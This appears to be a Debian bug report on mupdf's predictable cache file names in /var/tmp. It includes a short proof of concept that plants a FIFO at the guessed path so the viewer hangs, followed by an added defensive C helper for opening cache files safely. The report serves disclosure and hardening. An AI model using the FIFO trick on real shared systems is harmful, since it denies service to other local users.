Package: mupdf
Version: 1.20.3+ds1-1
Tags: security

mupdf opens predictably-named files in /var/tmp/. Local users can exploit it for denial of service, maybe worse.

Proof of concept:

    $ mkfifo -m 644 /var/tmp/usr%share%doc%debian-history%docs%project-history.en.epub.accel
    $ mupdf /usr/share/doc/debian-history/docs/project-history.en.epub
    [hangs forever]

-- System Information:
Architecture: i386

Versions of packages mupdf depends on:
ii  freeglut3        2.8.1-6
ii  libc6            2.34-8
ii  libfreetype6     2.12.1+dfsg-3
ii  libgl1           1.5.0-1
ii  libgumbo1        0.10.1+dfsg-4
ii  libharfbuzz0b    2.7.4-1+b1
ii  libjbig2dec0     0.19-3
ii  libjpeg62-turbo  1:2.1.2-1
ii  libmujs2         1.2.0-3
ii  libopenjp2-7     2.5.0-1
ii  libssl3          3.0.5-2
ii  libx11-6         2:1.8.1-2
ii  libxext6         2:1.3.4-1
ii  zlib1g           1:1.2.11.dfsg-4.1

Versions of packages mupdf suggests:
ii  mupdf-tools  1.20.3+ds1-1

-- 
Jakub Wilk
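
One way a program can read a cache file from a shared, world-writable directory without hanging on a planted FIFO, as an added example that is not part of the original report and is not MuPDF's code. The helper name open_cache_file_safely is hypothetical, and the ownership and mode policy it applies is an assumption about what a cache reader should accept.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not a MuPDF function): open an existing cache file
 * for reading without trusting what another local user may have placed at
 * a guessable path. Returns a descriptor, or -1 with errno set. */
int open_cache_file_safely(const char *path)
{
    struct stat st;
    /* O_NONBLOCK: opening a FIFO that has no writer returns at once.
     * O_NOFOLLOW: refuse a symlink as the last path component. */
    int fd = open(path, O_RDONLY | O_NONBLOCK | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0) {
        int saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    /* Accept only a regular file that we own and that nobody else can
     * write to; anything else is treated as a planted or stale entry. */
    if (!S_ISREG(st.st_mode) || st.st_uid != geteuid() ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    if (argc != 2)
        return EXIT_FAILURE;
    int fd = open_cache_file_safely(argv[1]);
    if (fd < 0) {
        perror("cache file rejected");
        return EXIT_FAILURE;
    }
    puts("cache file accepted");
    close(fd);
    return EXIT_SUCCESS;
}
```

Keeping such cache files in a per-user directory with mode 0700 instead of a shared one removes the guessable-path problem at its source; the checks above are for code that has to read from a shared location.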